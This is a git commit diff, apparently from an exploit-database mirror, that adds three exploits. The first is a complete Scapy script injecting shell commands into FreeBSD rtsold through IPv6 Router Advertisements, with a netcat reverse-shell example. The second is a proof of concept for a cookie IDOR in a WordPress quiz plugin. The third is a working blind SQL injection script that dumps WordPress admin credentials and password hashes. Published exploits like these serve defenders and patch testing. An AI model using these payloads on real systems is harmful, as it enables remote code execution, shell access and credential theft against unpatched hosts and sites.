Merge remote-tracking branch 'upstream/main'

certcc-ghbot · certcc-ghbot · commit 7170fdbe2a95 · 2025-12-26T13:02:02.000Z
diff --git a/exploits/multiple/webapps/52463.py b/exploits/multiple/webapps/52463.py
@@ -0,0 +1,126 @@
+# Exploit Title: FreeBSD rtsold 15.x - Remote Code Execution via DNSSL
+# Date: 2025-12-16
+# Exploit Author: Lukas Johannes Möller
+# Vendor Homepage: https://www.freebsd.org/
+# Version: FreeBSD 13.x, 14.x, 15.x (before 2025-12-16 patches)
+# Tested on: FreeBSD 14.1-RELEASE
+# CVE: CVE-2025-14558
+#
+# Description:
+#   rtsold(8) processes IPv6 Router Advertisement DNSSL options without
+#   validating domain names for shell metacharacters. The decoded domains
+#   are passed to resolvconf(8), a shell script that uses unquoted variable
+#   expansion, enabling command injection via $() substitution.
+#
+# Requirements:
+#   - Layer 2 adjacency to target
+#   - Target running rtsold with ACCEPT_RTADV enabled
+#   - Root privileges (raw socket for sending RA)
+#   - Python 3 + Scapy
+#
+# References:
+#   https://security.FreeBSD.org/advisories/FreeBSD-SA-25:12.rtsold.asc
+#   https://github.com/JohannesLks/CVE-2025-14558
+
+import argparse
+import struct
+import sys
+import time
+
+try:
+    from scapy.all import (
+        Ether, IPv6, ICMPv6ND_RA, ICMPv6NDOptPrefixInfo,
+        ICMPv6NDOptSrcLLAddr, Raw, get_if_hwaddr, sendp
+    )
+except ImportError:
+    sys.exit("[!] Scapy required: pip install scapy")
+
+
+def encode_domain(name):
+    """Encode domain in DNS wire format (RFC 1035)."""
+    result = b""
+    for label in name.split("."):
+        if label:
+            data = label.encode()
+            result += bytes([len(data)]) + data
+    return result + b"\x00"
+
+
+def encode_payload(cmd):
+    """Encode payload as DNS label with $() wrapper for command substitution."""
+    payload = f"$({cmd})".encode()
+    if len(payload) > 63:
+        # Split long payloads across labels (dots inserted on decode)
+        result = b""
+        while payload:
+            chunk = payload[:63]
+            payload = payload[63:]
+            result += bytes([len(chunk)]) + chunk
+        return result + b"\x00"
+    return bytes([len(payload)]) + payload + b"\x00"
+
+
+def build_dnssl(cmd, lifetime=0xFFFFFFFF):
+    """Build DNSSL option (RFC 6106) with injected command."""
+    data = encode_domain("x.local") + encode_payload(cmd)
+
+    # Pad to 8-byte boundary
+    pad = (8 - (len(data) + 8) % 8) % 8
+    data += b"\x00" * pad
+
+    # Type=31 (DNSSL), Length in 8-octet units
+    length = (8 + len(data)) // 8
+    return struct.pack(">BBH", 31, length, 0) + struct.pack(">I", lifetime) + data
+
+
+def build_ra(mac, payload):
+    """Build Router Advertisement with malicious DNSSL."""
+    return (
+        Ether(src=mac, dst="33:33:00:00:00:01")
+        / IPv6(src="fe80::1", dst="ff02::1", hlim=255)
+        / ICMPv6ND_RA(chlim=64, M=0, O=1, routerlifetime=1800)
+        / ICMPv6NDOptSrcLLAddr(lladdr=mac)
+        / ICMPv6NDOptPrefixInfo(
+            prefixlen=64, L=1, A=1,
+            validlifetime=2592000, preferredlifetime=604800,
+            prefix="2001:db8::"
+        )
+        / Raw(load=build_dnssl(payload))
+    )
+
+
+def main():
+    p = argparse.ArgumentParser(
+        description="CVE-2025-14558 - FreeBSD rtsold DNSSL Command Injection",
+        epilog="Examples:\n"
+               "  %(prog)s -i eth0\n"
+               "  %(prog)s -i eth0 -p 'id>/tmp/pwned'\n"
+               "  %(prog)s -i eth0 -p 'nc LHOST 4444 -e /bin/sh'",
+        formatter_class=argparse.RawDescriptionHelpFormatter
+    )
+    p.add_argument("-i", "--interface", required=True, help="Network interface")
+    p.add_argument("-p", "--payload", default="touch /tmp/pwned", help="Command to execute")
+    p.add_argument("-c", "--count", type=int, default=3, help="Packets to send (default: 3)")
+    args = p.parse_args()
+
+    try:
+        mac = get_if_hwaddr(args.interface)
+    except Exception as e:
+        sys.exit(f"[!] Interface error: {e}")
+
+    print(f"[*] Interface: {args.interface} ({mac})")
+    print(f"[*] Payload: {args.payload}")
+
+    pkt = build_ra(mac, args.payload)
+
+    for i in range(args.count):
+        sendp(pkt, iface=args.interface, verbose=False)
+        print(f"[+] Sent RA {i+1}/{args.count}")
+        if i < args.count - 1:
+            time.sleep(1)
+
+    print("[+] Done")
+
+
+if __name__ == "__main__":
+    main()
diff --git a/exploits/multiple/webapps/52464.txt b/exploits/multiple/webapps/52464.txt
@@ -0,0 +1,105 @@
+# Exploit Title: Chained Quiz  1.3.5 - Unauthenticated Insecure Direct Object Reference via Cookie
+# Date: 19-12-2025
+# Exploit Author: Karuppiah Sabari Kumar(0xsabre)
+# Vendor Homepage: https://wordpress.org/plugins/chained-quiz/
+# Software Link: https://downloads.wordpress.org/plugin/chained-quiz.1.3.3.zip
+# Version: <= 1.3.3
+# Tested on: WordPress / Linux
+# CVE: CVE-2025-10493
+
+------------------------------------------------------------
+
+## Vulnerability Type
+Insecure Direct Object Reference (IDOR) / Improper Authorization
+
+------------------------------------------------------------
+
+## Description
+The Chained Quiz plugin stores each quiz attempt using a predictable,
+auto-incrementing database ID (completion_id) and exposes this value
+directly in a client-side cookie named:
+
+    chained_completion_id<quiz_id>
+
+When submitting or re-submitting quiz answers via admin-ajax.php, the
+server updates the quiz attempt record based solely on this cookie value,
+without verifying that the attempt belongs to the currently authenticated
+user.
+
+No authentication is required to exploit this vulnerability when the
+plugin is used with default settings.
+
+The server retrieves the quiz attempt directly using the completion_id
+from the cookie and performs an UPDATE query without verifying ownership.
+
+As a result, an attacker can hijack or tamper with other users’ quiz
+attempts by guessing or enumerating valid completion_id values and
+replaying answer submissions.
+
+------------------------------------------------------------
+
+## Affected Component
+Quiz submission and results handling functionality via admin-ajax.php
+
+------------------------------------------------------------
+
+## Proof of Concept (PoC)
+
+### Step 1: Victim user submission
+A user completes a quiz. The submission is stored using a completion ID
+and associated with the user’s session via a cookie, for example:
+
+    chained_completion_id1=2
+
+------------------------------------------------------------
+
+### Step 2: Attacker interception
+The attacker completes the same quiz and intercepts their own submission
+request using a proxy or browser developer tools.
+
+Example request:
+
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: localhost
+Cookie: chained_completion_id1=1
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+
+answer=0&question_id=1&quiz_id=1&post_id=117&question_type=radio&points=0&action=chainedquiz_ajax&chainedquiz_action=answer&total_questions=1
+
+------------------------------------------------------------
+
+### Step 3: Tampering
+The attacker modifies the cookie value to match another user’s quiz
+attempt, for example:
+
+    chained_completion_id1=2
+
+The attacker may also modify parameters such as "answer" or "points" to
+manipulate quiz responses or scores.
+
+The modified request is then sent to the server.
+
+------------------------------------------------------------
+
+### Step 4: Result
+The server overwrites the victim user’s quiz submission, including answers
+and points, without validating ownership of the completion ID.
+
+------------------------------------------------------------
+
+## Impact
+An attacker can arbitrarily modify quiz answers, scores, or results
+belonging to other users. This results in an integrity violation of quiz
+data and allows unauthorized manipulation of finalized quiz attempts.
+In environments where quiz results are used for assessments, leaderboards,
+or certificates, this can undermine trust in the platform and affect any
+downstream integrations that rely on quiz completion data.
+
+------------------------------------------------------------
+
+## CWE
+- CWE-639: Authorization Bypass Through User-Controlled Key
+- CWE-285: Improper Authorization
+
+------------------------------------------------------------
diff --git a/exploits/multiple/webapps/52465.py b/exploits/multiple/webapps/52465.py
@@ -0,0 +1,144 @@
+# Exploit Title: WordPress Quiz Maker 6.7.0.56 - SQL Injection
+# Date: 2025-12-16
+# Exploit Author: Rahul Sreenivasan (Tr0j4n)
+# Vendor Homepage: https://ays-pro.com/wordpress/quiz-maker
+# Software Link: https://wordpress.org/plugins/quiz-maker/
+# Version: <= 6.7.0.56
+# Tested on: WordPress 6.x with Quiz Maker 6.7.0.56 on Ubuntu/Nginx/PHP-FPM
+# CVE: CVE-2025-10042
+
+from argparse import ArgumentParser
+from requests import get
+from requests.packages.urllib3 import disable_warnings
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+from time import time
+from sys import exit
+
+disable_warnings(InsecureRequestWarning)
+
+CHARSET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_-@.!$/:?"
+
+def send_payload(url, path, header, payload, timeout):
+    target = f"{url.rstrip('/')}/{path.lstrip('/')}"
+    headers = {
+        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
+        header: payload
+    }
+    try:
+        start = time()
+        get(target, headers=headers, timeout=timeout, verify=False)
+        return time() - start
+    except:
+        return timeout
+
+def check_vulnerable(url, path, header, sleep_time, timeout):
+    print("[*] Testing for SQL injection vulnerability...")
+
+    baseline = send_payload(url, path, header, "127.0.0.1", timeout)
+    print(f"[*] Baseline response time: {baseline:.2f}s")
+
+    payload = f"1' OR SLEEP({sleep_time})#"
+    injection = send_payload(url, path, header, payload, timeout)
+    print(f"[*] Injection response time: {injection:.2f}s")
+
+    if injection >= sleep_time * 0.7:
+        print("[+] Target is VULNERABLE!")
+        return True
+    else:
+        print("[-] Target does not appear to be vulnerable.")
+        return False
+
+def extract_length(url, path, header, query, timeout):
+    low, high = 1, 100
+
+    while low < high:
+        mid = (low + high) // 2
+        payload = f"1' OR IF(LENGTH(({query}))>{mid},SLEEP(1),0)#"
+        elapsed = send_payload(url, path, header, payload, timeout)
+
+        if elapsed >= 0.8:
+            low = mid + 1
+        else:
+            high = mid
+
+    return low
+
+def extract_char(url, path, header, query, position, timeout):
+    low, high = 32, 126
+
+    while low < high:
+        mid = (low + high) // 2
+        payload = f"1' OR IF(ASCII(SUBSTRING(({query}),{position},1))>{mid},SLEEP(1),0)#"
+        elapsed = send_payload(url, path, header, payload, timeout)
+
+        if elapsed >= 0.8:
+            low = mid + 1
+        else:
+            high = mid
+
+    return chr(low) if low <= 126 else "?"
+
+def extract_data(url, path, header, query, timeout):
+    length = extract_length(url, path, header, query, timeout)
+    print(f"[*] Data length: {length}")
+
+    result = ""
+    for i in range(1, length + 1):
+        char = extract_char(url, path, header, query, i, timeout)
+        result += char
+        print(f"\r[*] Extracting: {result}", end="", flush=True)
+
+    print()
+    return result
+
+def dump_users(url, path, header, timeout):
+    print("\n[*] Extracting WordPress admin users...")
+
+    # Get admin user login
+    query = "SELECT user_login FROM wp_users WHERE ID=1"
+    username = extract_data(url, path, header, query, timeout)
+    print(f"[+] Username: {username}")
+
+    # Get admin email
+    query = "SELECT user_email FROM wp_users WHERE ID=1"
+    email = extract_data(url, path, header, query, timeout)
+    print(f"[+] Email: {email}")
+
+    # Get password hash
+    query = "SELECT user_pass FROM wp_users WHERE ID=1"
+    password = extract_data(url, path, header, query, timeout)
+    print(f"[+] Password Hash: {password}")
+
+    return username, email, password
+
+def main():
+    parser = ArgumentParser(description="WordPress Quiz Maker SQLi Exploit (CVE-2025-10042)")
+    parser.add_argument("-u", "--url", required=True, help="Target WordPress URL")
+    parser.add_argument("-p", "--path", required=True, help="Path to quiz page")
+    parser.add_argument("-H", "--header", default="X-Forwarded-For", help="Header for injection")
+    parser.add_argument("-t", "--timeout", type=int, default=10, help="Request timeout")
+    parser.add_argument("--check", action="store_true", help="Only check vulnerability")
+    parser.add_argument("--dump", action="store_true", help="Dump admin credentials")
+    parser.add_argument("--query", help="Custom SQL query to extract")
+    args = parser.parse_args()
+
+    print("[+] WordPress Quiz Maker SQLi Exploit (CVE-2025-10042)")
+    print(f"[+] Target: {args.url}")
+
+    if not check_vulnerable(args.url, args.path, args.header, 3, args.timeout):
+        exit(1)
+
+    if args.check:
+        exit(0)
+
+    if args.dump:
+        dump_users(args.url, args.path, args.header, args.timeout)
+    elif args.query:
+        print(f"\n[*] Executing custom query: {args.query}")
+        result = extract_data(args.url, args.path, args.header, args.query, args.timeout)
+        print(f"[+] Result: {result}")
+    else:
+        dump_users(args.url, args.path, args.header, args.timeout)
+
+if __name__ == "__main__":
+    main()
diff --git a/files_exploits.csv b/files_exploits.csv
